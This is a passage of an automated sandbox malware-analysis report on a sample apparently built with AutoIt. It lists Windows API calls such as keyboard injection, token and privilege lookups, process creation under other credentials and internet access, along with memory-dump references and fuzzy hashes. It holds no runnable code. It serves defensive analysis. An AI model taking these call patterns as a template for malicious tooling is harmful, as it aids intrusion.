                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 1548245697-1075368562
                                    • Opcode ID: 07ba258c2008f28e47188a88200755e6a6aed3d75629c9d8fa9df034cdccd76e
                                    • Instruction ID: 9f77dc9118cd6eac7940ed1103478daf90506e14b407f07adccb6aa2c3c695f3
                                    • Opcode Fuzzy Hash: 07ba258c2008f28e47188a88200755e6a6aed3d75629c9d8fa9df034cdccd76e
                                    • Instruction Fuzzy Hash: 3541C671601208EFDB24CF14C884BAA7BBAEF84311F1180A9EE059F255D7B0DD48EBA0
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F8F910,00000000,?,?,?,?), ref: 00F87C4E
                                    • GetWindowLongW.USER32 ref: 00F87C6B
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F87C7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: 8098b476dfd9834c2efc770dc52f98a037f1613f978ffd2d53b60d0891fc430a
                                    • Instruction ID: e74516b0390fa53cdf0a1ff11b3a014c85ed3a405ee5350f40c2f8b1fd345794
                                    • Opcode Fuzzy Hash: 8098b476dfd9834c2efc770dc52f98a037f1613f978ffd2d53b60d0891fc430a
                                    • Instruction Fuzzy Hash: 4F31CD31A0420AAEDB11AF38CC45BEA77A9FF49334F204725F875932E0C735E855AB60
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F876D0
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F876E4
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F87708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: 64293a6021b869591d058e3d46be264f4b81d86a973a28411f550295c0972228
                                    • Instruction ID: 7b1394318af71d4b5ada25b9e448373751d91c55e0935902f215e145fe93cf61
                                    • Opcode Fuzzy Hash: 64293a6021b869591d058e3d46be264f4b81d86a973a28411f550295c0972228
                                    • Instruction Fuzzy Hash: 2F21B132510218ABDF11EF64CC42FEA3B69EF48724F210214FE156B1D0DAB5E854ABA0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F86FAA
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F86FBA
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F86FDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: df44f27f33a5954cc5a8d2c29f5757f42cbb2dcaa195ef7251716bd3e1474480
                                    • Instruction ID: fe53bdcf4552cb33566305854ce4d2f92423791fa466c5d3ff0452431dafb024
                                    • Opcode Fuzzy Hash: df44f27f33a5954cc5a8d2c29f5757f42cbb2dcaa195ef7251716bd3e1474480
                                    • Instruction Fuzzy Hash: C821B032A10118BFDF119F54EC85EEB37AAEF89760F118124FA049B190DA71EC51ABA0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F879E1
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F879F6
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F87A03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: a99664ed1e0562372f5d4938f6c5e26afa724bf61be0a125f18e7ebd1738cc31
                                    • Instruction ID: 0e9d6fcbff282b1b40860b45b07a228d74827c5500373d1c10059b8c6f2769b3
                                    • Opcode Fuzzy Hash: a99664ed1e0562372f5d4938f6c5e26afa724bf61be0a125f18e7ebd1738cc31
                                    • Instruction Fuzzy Hash: A311E732654208BEEF14AF60CC45FEB77ADEF89764F110519F645A60A0D671D811EB60
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F41D88,?), ref: 00F7C312
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F7C324
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                    • API String ID: 2574300362-1816364905
                                    • Opcode ID: 353c70d9ba2736c4d882b9a7b919cfa8d4c8318a40a5a1e3b0b707e2d09c4131
                                    • Instruction ID: 2bb35ca50575ec697fc42e3b9e1a27b311995c03e439a27a4e2dcc4e148147d7
                                    • Opcode Fuzzy Hash: 353c70d9ba2736c4d882b9a7b919cfa8d4c8318a40a5a1e3b0b707e2d09c4131
                                    • Instruction Fuzzy Hash: DDE01275A00713CFDB605F25D818AD676D4EF08769F80C43EE899D2250E770D885EBA1
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04C2E), ref: 00F04CA3
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F04CB5
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: 4e55ca520eca2970d4a950b541fb6725b21062c6bfc8ee9eb4ae7fac89a0a3f4
                                    • Instruction ID: 1e6c4d9ce50e707abb9849aa8b3a01bdde2706af737c0df32da41294d2078929
                                    • Opcode Fuzzy Hash: 4e55ca520eca2970d4a950b541fb6725b21062c6bfc8ee9eb4ae7fac89a0a3f4
                                    • Instruction Fuzzy Hash: 85D0C270900727CFD7205F30C90C68272D4AF00760F10C83A9881C2590D670D484E750
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04CE1,?), ref: 00F04DA2
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04DB4
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: ebdd71bcd7bc3273def4cb79ddd86d31f6b8b84868ac19295458fcfb710c8cf8
                                    • Instruction ID: ca4d572d3095ec60b5f3536df813066f4a18db81ac783d229845e671979003fd
                                    • Opcode Fuzzy Hash: ebdd71bcd7bc3273def4cb79ddd86d31f6b8b84868ac19295458fcfb710c8cf8
                                    • Instruction Fuzzy Hash: C0D0C770A00B13CFC720AF31C80CA8676E4AF043A8B00883AD8C2C2590E770E880EB90
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04D2E,?,00F04F4F,?,00FC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04D6F
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04D81
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: 21e8650ec5beacbf216ca6f66576f397e7e39efcb8a452a19dae8c0e0b902045
                                    • Instruction ID: f362a2672dc86b66cd89864d2df3c3d4c936784389a20ee3f65e313f7e7f7c18
                                    • Opcode Fuzzy Hash: 21e8650ec5beacbf216ca6f66576f397e7e39efcb8a452a19dae8c0e0b902045
                                    • Instruction Fuzzy Hash: 17D01770A10B17CFD720AF31D80D6A676E8AF157A6B11883FD486D6290E770E884EB51
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00F812C1), ref: 00F81080
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F81092
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: da4cd5f100419c226e9f6b7258e0870466cc6128c0c7fe5ac96cc9aba2a7bd98
                                    • Instruction ID: 7bf57619ea20cdfcf2ba43f7d82a7dbd8bf06213ec3b37180b5bb320a5c5ea38
                                    • Opcode Fuzzy Hash: da4cd5f100419c226e9f6b7258e0870466cc6128c0c7fe5ac96cc9aba2a7bd98
                                    • Instruction Fuzzy Hash: 31D01730910B12CFD720AF36DC1DAAA76E8AF05761B118D3AA48ADA150E7B0C8C0EB51
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F79009,?,00F8F910), ref: 00F79403
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F79415
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: 86192cbd312833984d20dda4ab23d1a29c52fe6603d07d6d827e051160ed778c
                                    • Instruction ID: 8b6a43299a24902ae661ae5db88bf689648c56afabb7a383734744c054a3bbff
                                    • Opcode Fuzzy Hash: 86192cbd312833984d20dda4ab23d1a29c52fe6603d07d6d827e051160ed778c
                                    • Instruction Fuzzy Hash: 40D0C730A44B17CFC7209F31E90D28276E4AF00361B00C83AA48AC2550E6B0C884EB12
                                    Similarity
                                    • API ID: LocalTime__swprintf
                                    • String ID: %.3d$WIN_XPe
                                    • API String ID: 2070861257-2409531811
                                    • Opcode ID: 88ed92509773e718aa685206a365ea5237619eaefb36786e2056344b51ad2f28
                                    • Instruction ID: 9e94b1bd479f61d0feb9b9f478e41f66f063651771219c7fa4848d815859e8cb
                                    • Opcode Fuzzy Hash: 88ed92509773e718aa685206a365ea5237619eaefb36786e2056344b51ad2f28
                                    • Instruction Fuzzy Hash: 1BD012B380411CEACB549B909C44AF97B7CF748301F1006D2BD0691440F2349BC4FB22
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d778a8f116615779210af719cd4492216e102ea07d7cbd073de39722ebd9dce1
                                    • Instruction ID: 9c291046d36bf7362ab23e98ca5bb2491e08d2aa09166d94c04f97cc9a8b3a7e
                                    • Opcode Fuzzy Hash: d778a8f116615779210af719cd4492216e102ea07d7cbd073de39722ebd9dce1
                                    • Instruction Fuzzy Hash: B5C18E75E04216EFCB14DF94D884EAEBBB5FF48311B208598E905EB251D730ED85EBA0
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 00F7E3D2
                                    • CharLowerBuffW.USER32(?,?), ref: 00F7E415
                                      • Part of subcall function 00F7DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F7DAD9
                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F7E615
                                    • _memmove.LIBCMT ref: 00F7E628
                                    Similarity
                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                    • String ID:
                                    • API String ID: 3659485706-0
                                    • Opcode ID: b958c959a3ab1ed3cabaad03a55fda84ac841b11afc033862cbb309a70c84f69
                                    • Instruction ID: 83fff29f2b45a379d4948aa213ecc37e770c44631face01a7e9b9760b570d744
                                    • Opcode Fuzzy Hash: b958c959a3ab1ed3cabaad03a55fda84ac841b11afc033862cbb309a70c84f69
                                    • Instruction Fuzzy Hash: 89C15C71A083119FC714DF28C88095ABBE4FF88714F1489AEF899DB352D775E905DB82
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: 41f8e55fbf9b6dd11e47860f7d048b656ee151fe0a4cd785f8e3f7151848709e
                                    • Instruction ID: b182fdc24a8d73a360e4d91f904d69227da037df27a547070b366cddde2c0628
                                    • Opcode Fuzzy Hash: 41f8e55fbf9b6dd11e47860f7d048b656ee151fe0a4cd785f8e3f7151848709e
                                    • Instruction Fuzzy Hash: 0551CB31A087019BDB20BF65EC95B29B3E4DF48311F60881FEE56C72D1EB749849BB15
                                    APIs
                                    • GetWindowRect.USER32(0198E638,?), ref: 00F89AD2
                                    • ScreenToClient.USER32(00000002,00000002), ref: 00F89B05
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F89B72
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 5e4ee732cffe5b1abf41310df957c260984e5306fa8544011e44db902e0a9800
                                    • Instruction ID: 5ac26778a9bb84c19ebd87c73ba5dfa8e32617fe80e4583bd3b214c05b3d0542
                                    • Opcode Fuzzy Hash: 5e4ee732cffe5b1abf41310df957c260984e5306fa8544011e44db902e0a9800
                                    • Instruction Fuzzy Hash: 7F511C74A04209AFCF14EF58D9859FE7BB5FF84324F188269F8159B290D770AE41EB50
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F6BB09
                                    • GetLastError.KERNEL32(?,00000000), ref: 00F6BB2F
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F6BB54
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F6BB80
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: 85cbbe6d28b62773a574e28bbbf0b1c5cd856d1796d36cc08d189ca847bda840
                                    • Instruction ID: c1fa90458cb0908e0329a14f03998d067d23d85b4f555a00963ed934af628360
                                    • Opcode Fuzzy Hash: 85cbbe6d28b62773a574e28bbbf0b1c5cd856d1796d36cc08d189ca847bda840
                                    • Instruction Fuzzy Hash: E6415E35600511DFCB10EF58C984A5DBBE1EF89320B098488EC4A9B3A2DB78FD41FB91
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F88B4D
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 4dc7fa2fb028806a3067e561ca98579fe64e1bed0f715cb15533bb141dbf80b8
                                    • Instruction ID: 14e7561fe07cf5753827d3e06ad646cfb7bf0a2209f62b3730d18c29e2644c14
                                    • Opcode Fuzzy Hash: 4dc7fa2fb028806a3067e561ca98579fe64e1bed0f715cb15533bb141dbf80b8
                                    • Instruction Fuzzy Hash: 6131E574A40208BFEB24BA58CC45FE93764EBC53A0FA44512FA11D72E1DF349942B741
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 00F8AE1A
                                    • GetWindowRect.USER32(?,?), ref: 00F8AE90
                                    • PtInRect.USER32(?,?,00F8C304), ref: 00F8AEA0
                                    • MessageBeep.USER32(00000000), ref: 00F8AF11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F61037
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F61053
                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F610B9
                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F6110B
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    APIs
                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F61176
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F61192
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F611F1
                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F61243
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F3644B
                                    • __isleadbyte_l.LIBCMT ref: 00F36479
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F364A7
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F364DD
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 00F85189
                                      • Part of subcall function 00F6387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F63897
                                      • Part of subcall function 00F6387D: GetCurrentThreadId.KERNEL32 ref: 00F6389E
                                      • Part of subcall function 00F6387D: AttachThreadInput.USER32(00000000,?,00F652A7), ref: 00F638A5
                                    • GetCaretPos.USER32(?), ref: 00F8519A
                                    • ClientToScreen.USER32(00000000,?), ref: 00F851D5
                                    • GetForegroundWindow.USER32 ref: 00F851DB
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    APIs
                                    • __setmode.LIBCMT ref: 00F20BF2
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67B20,?,?,00000000), ref: 00F05B8C
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67B20,?,?,00000000,?,?), ref: 00F05BB0
                                    • _fprintf.LIBCMT ref: 00F20C29
                                    • OutputDebugStringW.KERNEL32(?), ref: 00F56331
                                      • Part of subcall function 00F24CDA: _flsall.LIBCMT ref: 00F24CF3
                                    • __setmode.LIBCMT ref: 00F20C5E
                                    Similarity
                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                    • String ID:
                                    • API String ID: 521402451-0
                                    APIs
                                      • Part of subcall function 00F58652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F58669
                                      • Part of subcall function 00F58652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F58673
                                      • Part of subcall function 00F58652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58682
                                      • Part of subcall function 00F58652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F58689
                                      • Part of subcall function 00F58652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F5869F
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F58BEB
                                    • _memcmp.LIBCMT ref: 00F58C0E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F58C44
                                    • HeapFree.KERNEL32(00000000), ref: 00F58C4B
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 2182266621-0
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F71A97
                                      • Part of subcall function 00F71B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F71B40
                                      • Part of subcall function 00F71B21: InternetCloseHandle.WININET(00000000), ref: 00F71BDD
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    APIs
                                      • Part of subcall function 00F5F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F5E1C4,?,?,?,00F5EFB7,00000000,000000EF,00000119,?,?), ref: 00F5F5BC
                                      • Part of subcall function 00F5F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00F5F5E2
                                      • Part of subcall function 00F5F5AD: lstrcmpiW.KERNEL32(00000000,?,00F5E1C4,?,?,?,00F5EFB7,00000000,000000EF,00000119,?,?), ref: 00F5F613
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F5EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00F5E1DD
                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00F5E203
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F5EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00F5E237
                                    Strings
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    APIs
                                    • _free.LIBCMT ref: 00F35351
                                      • Part of subcall function 00F2594C: __FF_MSGBANNER.LIBCMT ref: 00F25963
                                      • Part of subcall function 00F2594C: __NMSG_WRITE.LIBCMT ref: 00F2596A
                                      • Part of subcall function 00F2594C: RtlAllocateHeap.NTDLL(01970000,00000000,00000001), ref: 00F2598F
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    APIs
                                    • _memset.LIBCMT ref: 00F04560
                                      • Part of subcall function 00F0410D: _memset.LIBCMT ref: 00F0418D
                                      • Part of subcall function 00F0410D: _wcscpy.LIBCMT ref: 00F041E1
                                      • Part of subcall function 00F0410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F041F1
                                    • KillTimer.USER32(?,00000001,?,?), ref: 00F045B5
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F045C4
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F3D6CE
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F58B2A
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00F58B31
                                    • CloseHandle.KERNEL32(00000004), ref: 00F58B4B
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F58B7A
                                    Similarity
                                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 2621361867-0
                                    • Opcode ID: 36a58f87283a196c49b80eb41da2b8bd05c5fd2a185b97d9cf2459eb35102c5c
                                    • Instruction ID: 4dfb71d6ec00a93b9597aff078973848f117ace6995de25a508d87d09e2364c7
                                    • Opcode Fuzzy Hash: 36a58f87283a196c49b80eb41da2b8bd05c5fd2a185b97d9cf2459eb35102c5c
                                    • Instruction Fuzzy Hash: B3114AB260020DBFDB018FA4DD49FEE7BADEB48359F144064FE04A2160C6758D69AB60
                                    APIs
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67B20,?,?,00000000), ref: 00F05B8C
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67B20,?,?,00000000,?,?), ref: 00F05BB0
                                    • gethostbyname.WS2_32(?), ref: 00F766AC
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F766B7
                                    • _memmove.LIBCMT ref: 00F766E4
                                    • inet_ntoa.WS2_32(?), ref: 00F766EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                    • String ID:
                                    • API String ID: 1504782959-0
                                    • Opcode ID: 9ebd287337c004e48786478578b194de565948c70235e9e9ac78f1571b230589
